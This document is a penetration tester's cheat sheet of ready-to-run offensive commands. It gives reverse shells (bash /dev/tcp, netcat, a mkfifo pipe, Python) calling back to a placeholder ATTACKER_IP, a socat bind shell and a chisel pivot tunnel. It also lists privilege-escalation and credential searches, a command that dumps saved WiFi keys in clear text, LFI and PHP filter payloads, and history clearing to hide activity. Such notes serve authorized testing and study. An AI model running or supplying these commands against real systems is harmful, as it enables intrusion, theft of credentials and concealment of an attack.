Pentesting Tips & Notes

Useful commands, shell tricks, and patterns I use frequently during penetration testing.

Stabilizing Shells

Make a reverse shell more usable. Restores terminal control in an unstable shell: background the shell with Ctrl-Z first, then run this in your local terminal:

stty raw -echo; fg

Spawn a proper TTY with Python (gives an interactive bash terminal):

python3 -c 'import pty; pty.spawn("/bin/bash")'

Fix the terminal after spawning the TTY (sets the terminal type and size so editors and pagers render correctly):

export TERM=xterm
stty rows 40 columns 160

Reverse Shells

Bash reverse shell (uses bash's /dev/tcp; needs bash, not sh/dash):

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Netcat (with -e exec support):

nc -e /bin/sh ATTACKER_IP 4444

Netcat fallback when -e is not available (uses a named pipe):

rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f

Python reverse shell (when bash or netcat is not available):

python3 -c 'import socket,subprocess,os;
s=socket.socket(); s.connect(("ATTACKER_IP",4444));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh"])'

Port Forwarding / Tunneling

SSH local port forward (makes the target's port 80 reachable on your local port 8080):

ssh -L 8080:localhost:80 user@target

Chisel reverse tunnel to pivot inside the network (the server runs on your machine, the client on the target; the target's port 80 becomes reachable on your localhost:8080):

chisel server -p 9001 --reverse
chisel client ATTACKER_IP:9001 R:8080:localhost:80

Socat bind shell (listens on the target; you connect to it from your machine):

socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/sh

Linux Enumeration

Find SUID binaries:

find / -perm -4000 2>/dev/null

Find binaries with Linux capabilities set:

getcap -r / 2>/dev/null

Show the commands the current user may run with sudo:

sudo -l

List listening TCP/UDP ports with their owning processes:

ss -tunlp

Find directories writable by the current user:

find / -writable -type d 2>/dev/null

Privilege Escalation Quick Wins

sudo -l (the first privilege escalation check):

sudo -l

PATH (check for PATH hijacking):

echo $PATH

Cron (list scheduled tasks):

cat /etc/crontab

Search for plaintext credentials (very noisy when run against /; narrow the path where possible):

grep -Ri "password" / 2>/dev/null

Web Enumeration

Directory brute force:

feroxbuster -u http://target/ -x php,txt,html -t 50

Robots.txt (check for hidden paths):

curl -s http://target/robots.txt

LFI (basic test payload):

?file=../../../../etc/passwd

PHP filter wrapper (returns the PHP source base64-encoded instead of executing it):

?page=php://filter/convert.base64-encode/resource=index.php

Hash Cracking

Identify the hash type:

hashid hash.txt

Hashcat (-m 0 is MD5; choose the mode matching the identified hash type):

hashcat -m 0 hash.txt rockyou.txt

John:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Windows Enumeration

List Windows users:

net user

Systeminfo (OS version and patch level):

systeminfo

Services (list services and their state):

sc query

WiFi credentials (list saved profiles, then show a profile's key in clear text; requires an elevated prompt):

netsh wlan show profiles
netsh wlan show profile NAME key=clear

OPSEC / Cleanup

Network connections (active and listening):

netstat -tupln

Clear shell history:

history -c && history -w